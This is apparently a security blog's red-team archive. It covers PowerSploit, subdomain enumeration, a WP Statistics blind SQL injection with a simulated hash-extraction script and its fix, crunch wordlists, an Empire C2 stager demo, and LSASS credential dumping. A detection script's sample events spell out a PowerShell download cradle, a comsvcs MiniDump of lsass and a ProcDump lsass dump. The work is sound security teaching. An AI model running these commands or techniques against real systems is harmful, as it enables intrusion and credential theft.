Category Archives: RedTeam

Importing Modules in PowerShell

Many modules ship with PowerShell and are loaded on demand the first time one of their commands is used. The “Get-Module” command lists the modules imported into the current session.

“Get-Module -ListAvailable” lists every module that can be imported from the module paths.

Additional modules must be imported before their commands can be used; once a module is imported, all of its commands are available in that session. We will use PowerSploit as the example. The PowerSploit project is no longer maintained, but sometimes we still want its capabilities. First, download the package from the project’s GitHub repository. Then copy it into one of the module folders on the machine. There are several module locations, and “$Env:PSModulePath” lists them.

Create a folder called PowerSploit inside one of those locations (the folder name must match the module name, which is the name of its .psd1 manifest) and copy all files from the downloaded package into it.

“Import-Module PowerSploit” loads the module into the current session (it does not install anything permanently), and all of its commands become available. Two caveats: the execution policy may refuse to load unsigned scripts, in which case run PowerShell with “-ExecutionPolicy Bypass” for the session, and Windows Defender detects the PowerSploit files and will quarantine them as soon as they are copied unless the lab machine has an exclusion.

“Get-Command -Module PowerSploit” lists all the commands of this module.

“Get-Help <command>” shows the usage of a command, and “Get-Help <command> -Examples” shows example invocations.

Subdomain Enumeration

Subdomain enumeration is an information-gathering technique used to map every site a company exposes to the internet. In large organisations it is very common to find forgotten websites that carry vulnerabilities or sensitive data, so subdomain enumeration is also important in bug bounty work.

The first technique is passive: searching existing DNS and certificate records rather than touching the target. There are many sources for this, but note that records of decommissioned servers may remain in these archives, so every name still has to be resolved and probed before it is treated as live.

DNSdumpster.com: gives archived information about a domain together with extras such as geolocation, an nmap port scan, a visual map of the domain, and HTTP responses that show whether a host is alive.

crt.sh: searches Certificate Transparency logs for TLS certificates issued to a domain and its subdomains. Wildcard entries such as *.dev.example.com and long-expired certificates are common in the results and are worth noting rather than discarding.

VirusTotal: searching a domain in VirusTotal returns the subdomains it has observed along with additional information about the domain.

The other technique is automated enumeration with tools that combine passive sources with active checks.

amass: has many options for discovering subdomains and the assets associated with them.

Sublist3r: lists the subdomains of a domain from search engines and other public sources, and includes a brute-force module called subbrute that tries names from a wordlist against the target’s DNS (this part is active and visible to the target).

#sublist3r -v -d facebook.com
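The passive step above ends with a pile of certificate records rather than a host list. The script below is an added example (not code from this post or from crt.sh) that turns crt.sh JSON output into a de-duplicated, in-scope host list and separates names that still have a valid certificate from names seen only on expired ones. It assumes the JSON export crt.sh serves at https://crt.sh/?q=%25.example.com&output=json, where each object carries a newline-separated “name_value” and an ISO “not_after” timestamp; the sample data is constructed so the script runs offline.

```python
"""Turn crt.sh JSON output into a de-duplicated list of in-scope hostnames.

Added example, not the post's or crt.sh's code. Assumes the crt.sh JSON export
shape (list of objects with "name_value" and "not_after"). Sample is constructed.
"""
import json
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample in the crt.sh JSON shape (not a real query result).
SAMPLE_CRTSH_JSON = json.dumps([
    {"id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2023-01-10T00:00:00", "not_after": "2023-04-10T00:00:00"},
    {"id": 2, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nDEV.example.com",     # wildcard + mixed case
     "not_before": "2021-05-01T00:00:00", "not_after": "2021-08-01T00:00:00"},
    {"id": 3, "issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "mail.example.com",
     "name_value": "mail.example.com\nautodiscover.example.com",
     "not_before": "2024-02-01T00:00:00", "not_after": "2025-02-01T00:00:00"},
    {"id": 4, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "example.com.attacker.test",                # looks similar, out of scope
     "name_value": "example.com.attacker.test",
     "not_before": "2024-03-01T00:00:00", "not_after": "2024-06-01T00:00:00"},
])


def in_scope(name: str, apex: str) -> bool:
    """True for the apex itself and anything ending in ".apex" (not mere substrings)."""
    return name == apex or name.endswith("." + apex)


def extract_subdomains(crtsh_json: str, apex: str) -> Dict[str, datetime]:
    """Map each in-scope hostname to the latest certificate expiry seen for it."""
    apex = apex.lower().rstrip(".")
    found: Dict[str, datetime] = {}
    for entry in json.loads(crtsh_json):
        expiry = datetime.fromisoformat(entry["not_after"])
        for raw in entry.get("name_value", "").splitlines():
            name = raw.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]          # a wildcard cert still tells us the base name exists
            if not name or not in_scope(name, apex):
                continue
            if name not in found or expiry > found[name]:
                found[name] = expiry
    return found


def split_by_cert_status(found: Dict[str, datetime], now_iso: str) -> Tuple[List[str], List[str]]:
    """Names with a still-valid certificate vs. names seen only on expired ones.

    The expired-only names are the "forgotten" hosts the post talks about: they
    may be decommissioned, or still up with nobody looking after them, so they
    should be resolved and probed rather than dropped.
    """
    now = datetime.fromisoformat(now_iso)
    live = sorted(n for n, exp in found.items() if exp >= now)
    stale = sorted(n for n, exp in found.items() if exp < now)
    return live, stale


if __name__ == "__main__":
    hosts = extract_subdomains(SAMPLE_CRTSH_JSON, "example.com")
    live, stale = split_by_cert_status(hosts, "2024-06-01T00:00:00")
    print("valid cert  :", ", ".join(live))
    print("expired only:", ", ".join(stale))
```

The scope check deliberately requires a leading dot, so look-alike names such as example.com.attacker.test that crt.sh returns for a substring search are dropped instead of being probed as if they were the target’s.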

SQL Injection Vulnerability in WPStatistics

WP Statistics, as the name suggests, is a plugin that lets site owners see and display their visitor counts. It also records visitors’ IP addresses and country details.

The Wordfence Threat Intelligence team announced that they found a vulnerability in the WP Statistics plugin, which is installed on more than 600,000 WordPress sites. It is an SQL injection vulnerability that lets an unauthenticated visitor read information from the site’s database, including user emails and password hashes.

Description: Unauthenticated Time-Based Blind SQL Injection
Affected Plugin: WP Statistics
Plugin Slug: wp-statistics
Affected Versions: < 13.0.8
CVE ID: CVE-2021-24340
CVSS Score: 7.5 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Fully Patched Version: 13.0.8

WP Statistics lets administrators see page statistics, such as how much traffic each page gets, and according to the researchers this feature allowed unauthenticated attackers to reach the database. Their post states: “As this was a Time-Based Blind SQL injection vulnerability, exfiltrating information would be a relatively slow process, and it would be impractical to use it to extract bulk records, but high-value information such as user emails, password hashes, and encryption keys and salts could be extracted in a matter of hours with the help of automated tools such as sqlmap. In a targeted attack, this vulnerability could be used to extract personally identifiable information from commerce sites containing customer information. This underscores the importance of having security protections with an endpoint firewall in place wherever sensitive data is stored.”
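To make the “slow but practical” point concrete, here is an added example (not WP Statistics code, and not from the Wordfence post) that simulates a time-based blind SQL injection end to end: a query that splices user input into SQL, the latency oracle an attacker builds on it, the character-by-character extraction that makes it slow, and the parameterised query that closes the hole. The table and column names, the vulnerable parameter and the delay are constructed for the demo; SQLite with a registered sleep() stands in for MySQL’s SLEEP().

```python
"""Time-based blind SQL injection, simulated: vulnerable query, latency oracle,
character-by-character extraction, and the parameterised fix.

Added example; not WP Statistics code. Schema, parameter and delay are
constructed for the demo. SQLite + a registered sleep() emulates MySQL SLEEP().
"""
import sqlite3
import time
from typing import Callable, Tuple

DELAY = 0.05            # seconds an injected sleep() costs (real attacks use 5-10 s)
THRESHOLD = DELAY / 2   # a response slower than this is read as "true"


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    # MySQL SLEEP() equivalent: blocks for the given seconds, then returns 0.
    con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    con.executescript("""
        CREATE TABLE pages(url TEXT, hits INTEGER);
        INSERT INTO pages VALUES ('/about', 7), ('/blog', 42);
        CREATE TABLE users(id INTEGER, email TEXT, pass_hash TEXT);
        INSERT INTO users VALUES (1, 'admin@example.test', '$P$Bxyz');
    """)
    return con


def vulnerable_hits(con: sqlite3.Connection, url: str) -> int:
    """The bug: attacker-controlled text is spliced into the SQL statement."""
    row = con.execute(f"SELECT hits FROM pages WHERE url = '{url}'").fetchone()
    return row[0] if row else 0


def fixed_hits(con: sqlite3.Connection, url: str) -> int:
    """The fix: the value travels as a bound parameter and can never become SQL."""
    row = con.execute("SELECT hits FROM pages WHERE url = ?", (url,)).fetchone()
    return row[0] if row else 0


Handler = Callable[[sqlite3.Connection, str], int]


def oracle(handler: Handler, con: sqlite3.Connection, condition: str) -> bool:
    """Ask one yes/no question. The page looks identical either way; only the latency differs."""
    payload = (f"' OR (SELECT CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END "
               f"FROM users WHERE id = 1) --")
    start = time.perf_counter()
    handler(con, payload)
    return time.perf_counter() - start >= THRESHOLD


def extract(handler: Handler, con: sqlite3.Connection, column: str, max_len: int = 16) -> Tuple[str, int]:
    """Recover users.<column> for id 1, one character at a time, by binary search on its code point.

    Returns the recovered text and the number of requests: 7 per character plus 7
    to detect the end. That cost is why bulk extraction over a time channel is
    impractical while a single hash or key is a matter of hours.
    """
    recovered, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(handler, con, f"unicode(substr({column}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:          # past the end: substr() is '' and unicode('') is NULL, so never "true"
            break
        recovered += chr(lo)
    return recovered, requests


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract(vulnerable_hits, db, "pass_hash"))
    print("fixed     :", extract(fixed_hits, db, "pass_hash"))
```

Against the vulnerable handler the 7-character hash comes back in 56 requests, each true answer costing one full delay; against the parameterised handler the same payloads are just a URL that matches nothing, every question reads as false, and the extraction stops after the first character with nothing recovered. Note that the vulnerable function never returns anything different for the attacker, which is exactly why this class of bug is invisible to tests that only check response content.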

Creating Wordlist for Brute Force Attack

Brute force is an old attack technique, but it can still be gold. For a brute-force attack we need a wordlist (a password list) containing the candidates the tool will try; the tool then tries thousands of them per second. Strictly speaking, trying a prepared list is a dictionary attack, while pure brute force enumerates every combination of a character set; crunch can produce either. The stronger your list is, the more successful you will be at cracking passwords.

Different targets need different wordlists. Sometimes we have indicators about a target’s password from what we know about the person, such as children’s names, pet names or birthdays. We may also know the application’s password policy, for example a minimum of 12 characters. In such cases we need wordlists tailored to each target, and the right wordlist saves time; considering how long a brute-force attack takes, it can save hours or days.

“Crunch” is a tool that lets us create custom wordlists exactly the way we want. Both Kali and Parrot include crunch, and creating wordlists with it is very easy. Let’s take a look;

I will use Parrot for crunch; it is under Pentesting > Password Attacks > Password Profiling & Wordlists in the Parrot menu.

Usage:

Crunch does not print much about its usage when started without arguments (the full option list is in “man crunch”). The screenshot below shows the opening screen of crunch;

The basic syntax is;
# crunch <min> <max> <char set> -o <output file>
min = Minimum password length
max = Maximum password length
char set = The character set used to generate the passwords (optional; lowercase letters by default)
-o = The wordlist file crunch writes


When we ask for a wordlist of 8 characters, crunch first prints an estimate of how many lines it will produce and how large the file will be, which is worth reading before letting it run;

By default this generates passwords from lowercase letters only. If we want 8-character passwords mixing lowercase letters and digits, we pass that character set as the third argument, like below;

We can define the character set however we want. Of course, the larger the set and the length, the longer the generation takes and the bigger the file: lowercase letters plus digits over 8 positions is 36^8, about 2.8 trillion lines and roughly 25 TB on disk. So it is better to guess some indicators about the password and create a targeted wordlist instead.

It is also possible to use the named charsets defined in a charset file such as /usr/share/rainbowcrack/charset.txt (crunch ships its own in /usr/share/crunch/charset.lst) through crunch’s -f option, which takes the file path followed by the charset name. We can view the file with the command below;

The charsets in charset.txt are;
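The arithmetic behind crunch’s size estimate, and the difference between a blind list and a targeted one, are easier to see in code than in screenshots. The script below is an added example, not crunch itself and not from this post: it mirrors crunch’s positional arguments (min, max, charset) and its habit of reporting line count and byte size before writing, and adds a pattern mode modelled on crunch -t in which “@” marks a position to fill from the charset and every other character is fixed (crunch’s other placeholders are not implemented). The charset names follow crunch’s charset.lst.

```python
"""A crunch-style wordlist generator with the size estimate crunch prints first.

Added example; not crunch and not the post's code. Mirrors crunch's
(min, max, charset) arguments and -o output; the '@' pattern mode is a
simplified take on crunch -t. Charset names follow crunch's charset.lst.
"""
import itertools
from typing import Iterable, Iterator, Tuple

LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
CHARSETS = {                                     # a few names from crunch's charset.lst
    "lalpha": LOWER,
    "lalpha-numeric": LOWER + DIGITS,
    "mixalpha-numeric": LOWER + LOWER.upper() + DIGITS,
}


def estimate(min_len: int, max_len: int, charset: str) -> Tuple[int, int]:
    """Lines and bytes (each word plus a newline) the list would contain.

    Same arithmetic crunch reports before it starts writing: for each length k,
    |charset|**k words of k+1 bytes.
    """
    n = len(set(charset))
    lengths = range(min_len, max_len + 1)
    return sum(n ** k for k in lengths), sum(n ** k * (k + 1) for k in lengths)


def generate(min_len: int, max_len: int, charset: str) -> Iterator[str]:
    """Every combination from min_len to max_len: shortest first, lexicographic within a length."""
    chars = sorted(set(charset))
    for k in range(min_len, max_len + 1):
        for combo in itertools.product(chars, repeat=k):
            yield "".join(combo)


def from_pattern(pattern: str, charset: str) -> Iterator[str]:
    """Targeted list: fill only the '@' positions, e.g. 'Summer@@' with digits."""
    slots = [i for i, c in enumerate(pattern) if c == "@"]
    chars = sorted(set(charset))
    for combo in itertools.product(chars, repeat=len(slots)):
        word = list(pattern)
        for i, ch in zip(slots, combo):
            word[i] = ch
        yield "".join(word)


def write_wordlist(path: str, words: Iterable[str]) -> int:
    """Stream words to a file the way crunch -o does; returns the line count."""
    count = 0
    with open(path, "w", encoding="ascii") as fh:
        for word in words:
            fh.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    for name in ("lalpha", "lalpha-numeric", "mixalpha-numeric"):
        lines, size = estimate(8, 8, CHARSETS[name])
        print(f"8 chars, {name:17}: {lines:>22,} lines, {size / 1e12:8.1f} TB")
    targeted = sum(1 for _ in from_pattern("Summer@@", DIGITS))
    print(f"Summer@@ with digits: {targeted} lines")
```

Running the main block shows the scale the post warns about: 8 lowercase characters are about 1.9 TB, lowercase plus digits about 25 TB, and mixed-case alphanumerics nearly 2 PB, while a targeted pattern such as a known word plus two digits is 100 lines. The generator streams, so writing a large list never holds it in memory, but the estimate is the number to look at before deciding whether to write it at all.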

System Analysis with Process Explorer

Computer forensics is a set of methodical techniques for gathering, identifying and presenting evidence from digital equipment. Many different techniques are needed; one of them is collecting system information. Process Explorer is a tool that helps you collect system and process information from any Windows machine.

Process Explorer (procexp.exe, or procexp64.exe on 64-bit Windows) is a Sysinternals tool that can be downloaded from Microsoft. Once you run it, it lists all running processes as a tree in the upper pane, and the lower pane shows details (DLLs or handles) of the selected process.

To view System Information, click View in the menu bar and then System Information. The System Information window displays global performance metrics (CPU, memory, I/O, GPU) much like Task Manager.

To view a process’s DLLs, select the process in the upper pane and choose View > Lower Pane View > DLLs.

To view a DLL’s properties, right-click the DLL and select Properties. The dialog has two tabs, Image and Strings. The Image tab shows details of the DLL file, and its Verify button checks the file’s Authenticode signature.

If Verify reports the publisher as “(Verified) Microsoft Windows”, the file is signed by Microsoft and has not been modified. That tells you the file is genuine, not that the process is harmless: signed Windows binaries such as rundll32.exe are routinely abused to run attacker code, so check the command line and the parent process as well.

The Strings tab lists the printable ASCII and Unicode strings found in the selected file. This helps determine whether the process is associated with malware, for example by revealing URLs, suspicious API names or commands. The tab has two options, Image and Memory: Image shows the strings in the file on disk, while Memory shows the strings in the loaded image in memory. Packed malware that looks clean on disk often gives itself away in the Memory view once it has unpacked.

You can also save the Image and/or Memory strings to a text file.

Process Explorer can also show a process’s handles: View > Lower Pane View > Handles. To view a handle’s properties, right-click it and select Properties.

The Security tab displays the permissions on the object the handle refers to. You can also close the handle from the same right-click menu; closing a handle the process still needs can crash it, so use this carefully.

How to Install Metasploit on Ubuntu

If you are familiar with infosec, you already know what Metasploit is, so I will not explain it here. Metasploit comes preinstalled on Kali, but if you use Ubuntu like me, it is better to install Metasploit there than to switch to Kali just to use it. It is very easy to install Metasploit on Ubuntu (all versions).

First, update the system;

    #sudo apt update
    #sudo apt dist-upgrade

Once Ubuntu is updated, fetch the Metasploit installer;

    #cd /tmp
    #curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

After downloading the installer, make it executable and run it;

    #chmod +x msfinstall
    #sudo ./msfinstall

After installation, run the command below to initialise and start the local database (run it as a non-root user);

    $msfdb init

$ msfdb init
Creating database at /home/attacker/.msf4/db
Starting database at /home/attacker/.msf4/db…success
Creating database users
Writing client authentication configuration file /home/attacker/.msf4/db/pg_hba.conf
Stopping database at /home/attacker/.msf4/db
Starting database at /home/attacker/.msf4/db…success
Creating initial database schema
[?] Initial MSF web service account username? [attacker]:
[?] Initial MSF web service account password? (Leave blank for random password):
Generating SSL key and certificate for MSF web service
Attempting to start MSF web service…success
MSF web service started and online
Creating MSF web service user attacker

    ############################################################
    ##              MSF Web Service Credentials               ##
    ##                                                        ##
    ##        Please store these credentials securely.        ##
    ##    You will need them to connect to the webservice.    ##
    ############################################################

MSF web service username: attacker
MSF web service password: WDq33xRU6lVpVy+7bvdISdg9KusbHy7rfXSguE7GoQs=
MSF web service user API token: 8d4e7374d90b19f1a20a99da46cc2bc07684244e5b30b1061990be11fc31fbf5ccc761011a98c241


MSF web service configuration complete
The web service has been configured as your default data service in msfconsole with the name “local-https-data-service”

If needed, manually reconnect to the data service in msfconsole using the command:
db_connect --token 8d4e7374d90b19f1a20a99da46cc2bc07684244e5b30b1061990be11fc31fbf5ccc761011a98c241 --cert /home/attacker/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443

The username and password are credentials for the API account:
https://localhost:5443/api/v1/auth/account

If you see output like the above, Metasploit is ready to use;

    $msfconsole

$ msfconsole
                                                  

     .~+P“““-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-““`                        “““““““`          `
+++++++++++++++++++++++sydhyoyso/:.““…`…-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
–.`                 .-.-…-////+++++++++++++++////////~~//////++++++++++++///
                                `……………`              `…-/////…`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\…//M\\…/hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/“-hd:  “                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-“““       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:“`-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso–/ydh//+s+/ossssso:–syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/…osydh/-+oo:-`o//…oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd–:mN/`           ||–X–||          ||–X–||
………./yddy/:…+hmo-…hdd:…………\\=v=//…………\\=v=//………
================================================================================
=====================+——————————–+=========================
=====================| Session one died of dysentery. |=========================
=====================+——————————–+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It’s always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.0.13-dev-                         ]
+ -- --=[ 2072 exploits - 1120 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View advanced module options with advanced

msf6 >

 

C&C with Empire – A Mitre Att&ck T1071 and T1086 Demo

.. a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. It premiered at BSidesLV in 2015.
ReadMe file of Empire 

Empire is a publicly available post-exploitation framework used by nation-state threat actors and red teams alike. This demo covers gaining C&C and maps to the MITRE ATT&CK tactic Command and Control and techniques T1071 (Application Layer Protocol) and T1086 (PowerShell; since retired and folded into T1059.001).

To get all of Empire’s functions, install the maintained BC-SECURITY fork rather than the original, now-archived project. Cloning it is the first step; its installer script then installs the dependencies;

        git clone https://github.com/BC-SECURITY/Empire

After installing Empire, we create a listener on port 80 (plain HTTP). I am using Ubuntu for this demo.

Once the listener is up, we need a stager. Here we use a batch (bat) stager;

Executing the commands above creates a malicious batch file in the /tmp/ folder. When the victim runs this file on their machine, we get a session. The “agents” command lists active sessions, as shown below, and “interact <agent id>” opens the C&C channel to the victim.

Empire is a good, fast C&C framework, but without obfuscation its activity is easy for defence teams to spot: the default batch stager launches powershell.exe with a long Base64 “-enc” argument, and the agent’s HTTP beaconing is regular. In Event Viewer we can find logs of the malicious behaviour (process creation, and PowerShell script block logging if it is enabled);

For defence, it is important to run an EDR solution on endpoint machines. You can find my EDR Choosing Guide post here.

Credential Dumping – Attack and Defense Techniques (MITRE ATT&CK T1003)

Credential Dumping

As MITRE describes on its website, adversaries dump credentials after gaining access to a computer in order to obtain login material for lateral movement. Several tools and techniques can dump a computer’s credentials. Here I will show two credential-dumping techniques and how FireEye’s Endpoint Security product prevents them, as a quick demo.

lsass

Before the demo, a short brief on lsass. The LSA (Local Security Authority) authenticates users to the computer; for local accounts it checks the SAM (Security Accounts Manager) database to validate the credentials. LSASS.exe (Local Security Authority Subsystem Service) is the process that hosts the LSA and enforces the local security policy. Its memory holds the credential material of logged-on users: NT hashes, Kerberos tickets and keys, and, where the WDigest provider is enabled (the default before Windows 8.1 and Server 2012 R2), clear-text passwords. Anyone who can dump lsass and take the dump file off the machine can therefore recover hashes for pass-the-hash, and on older or misconfigured systems the clear-text passwords themselves.

FireEye HX Process Guard

HX is FireEye’s Endpoint Security product, as you know already. I will not explain what it is and does here, but in short it is an EDR solution with antivirus and several other prevention modules. I wanted to try its Process Guard module, which blocks attackers from dumping the lsass process.

“The Process Guard Module for FireEye Endpoint Security prevents attackers from obtaining access to credential data or key material stored within the lsass.exe process, thus protecting endpoints against common credential theft attacks,” says FireEye about Process Guard.

Here I will show some techniques to dump lsass and how Process Guard prevents them. These techniques map to the MITRE ATT&CK tactic Credential Access, technique T1003 (sub-technique T1003.001, LSASS Memory).

Credential Dumping with comsvcs.dll

comsvcs.dll is part of the Windows OS, a hidden system file found in \Windows\System32. It exports a MiniDump function that can be called through rundll32.exe, so it can be used to dump the memory of the lsass.exe process. Because both files are signed Microsoft binaries, nothing has to be dropped on the host, which is why this living-off-the-land technique is popular.

First, the process ID of lsass.exe must be identified (for example with tasklist or Get-Process lsass);

Then the command below, which passes the PID, the output path and the word full to the MiniDump export, dumps lsass;

A file of about 48 MB is created by this process;

Now it is time to run Mimikatz against the dump and get the passwords, as clear text or as hashes depending on the OS and its WDigest setting;

As you can see, it is very easy to get the credentials of the user of a compromised computer if you do not protect the lsass.exe process against malicious behaviour. Now I will try to prevent it using FireEye HX’s Process Guard module. For this, I enable the Process Guard module in my computer’s policy;

Then the lsass dump command again;

Afterwards, when I check the created dump file, I see an empty 0 MB file;

When I check the Process Guard module in HX’s console, I can see HX has detected this behaviour, carried out from PowerShell;

Credential Dump with ProcDump

ProcDump is a Sysinternals tool for generating memory dumps of applications. After disabling the Process Guard module in HX again, I try to dump lsass using ProcDump;

A 48 MB file has been created;

Again Mimikatz, and the passwords or hashes (depending on the OS);

Then let’s try again after enabling Process Guard. I run ProcDump again, this time with Process Guard enabled;

It got an error while creating the file and could not create any dump.
NOTE 1: These tests were done with HX’s antivirus disabled. Otherwise the AV would block Mimikatz and delete or quarantine it. This is the alarm for that behaviour;

NOTE 2: Even if you enable neither Process Guard nor antivirus, HX generates an IOC alert for these attacks. The IOC tells us that the “-ma” switch is being used with “lsass.exe” on the command line. This attack and IOC map to the MITRE ATT&CK tactic Credential Access, technique T1003. Without such a product the same indicators are still visible in process-creation logs (Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1): rundll32.exe loading comsvcs.dll with MiniDump, or procdump run with -ma against lsass.
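The Empire demo above says its unobfuscated stager is easy to spot in Event Viewer, and this post says the lsass dumps leave a command-line IOC. The script below is one added example serving both posts (it is not Empire, Sysinternals, FireEye or the posts’ own code): a small set of rules run over process-creation records. The records are constructed to carry the two fields of a Windows 4688 event that matter here (NewProcessName and CommandLine) and are not real captures. The “-NoP -sta -w 1 -enc” launcher shape is an assumption based on unobfuscated Empire batch stagers; the “-ma lsass” ProcDump pattern is the IOC described in NOTE 2; the comsvcs MiniDump call is the technique shown above.

```python
"""Flag process-creation events matching the attacks on this page: an
Empire-style encoded PowerShell launcher, and LSASS dumps via comsvcs.dll
MiniDump or ProcDump -ma.

Added example; not Empire, Sysinternals, FireEye or the posts' code. Events are
constructed (4688-style NewProcessName/CommandLine), not real captures.
"""
import base64
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, str]


def _encode_ps(script: str) -> str:
    """What powershell -EncodedCommand expects: Base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real log captures). Indexes 3 and 4 are benign.
EVENTS: List[Event] = [
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoP -sta -w 1 -enc "
                    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/launcher')")},
    {"NewProcessName": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 672 C:\Users\Public\out.dmp full"},
    {"NewProcessName": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp"},
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"NewProcessName": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma notepad.exe C:\Temp\np.dmp"},
]

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
LAUNCHER_RE = re.compile(r"-nop\b.*-w\s+1\b", re.I)            # Empire-style switches (assumed)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|iex\b|invoke-expression", re.I)
PROCDUMP_LSASS_RE = re.compile(r"\s-ma\s+lsass(?:\.exe)?\b", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -enc/-EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: Event) -> List[Tuple[str, str]]:
    """(rule name, ATT&CK technique) for every rule the event matches."""
    exe = event["NewProcessName"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    hits: List[Tuple[str, str]] = []
    if exe in ("powershell.exe", "pwsh.exe"):
        script = decode_encoded_command(cmd)
        # Encoded command plus either the launcher switches or a download cradle inside it.
        if script is not None and (LAUNCHER_RE.search(cmd) or CRADLE_RE.search(script)):
            hits.append(("empire_style_encoded_launcher", "T1059.001 (formerly T1086)"))
    if exe == "rundll32.exe" and "comsvcs.dll" in cmd.lower() and "minidump" in cmd.lower():
        hits.append(("comsvcs_minidump", "T1003.001"))
    if exe.startswith("procdump") and PROCDUMP_LSASS_RE.search(cmd):
        hits.append(("procdump_lsass", "T1003.001"))
    return hits


def scan(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Run every event through the rules; returns (event index, rule, technique)."""
    return [(i, rule, tech) for i, ev in enumerate(events) for rule, tech in classify(ev)]


if __name__ == "__main__":
    for i, rule, tech in scan(EVENTS):
        print(f"event {i}: {rule:32} {tech:28} {EVENTS[i]['CommandLine'][:60]}")
```

Two design points matter for real logs. The PowerShell rule decodes the Base64 and inspects the script rather than alerting on every “-enc” (administrators use encoded commands too), so a plain “-File backup.ps1” run and a ProcDump of notepad stay quiet while the three attack records fire. And because the page shows how trivially the same dump is taken with a signed Microsoft DLL, the comsvcs rule keys on the DLL name and the MiniDump export, not on the name of a known hacking tool.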

Dark Web; Anonymity and Privacy

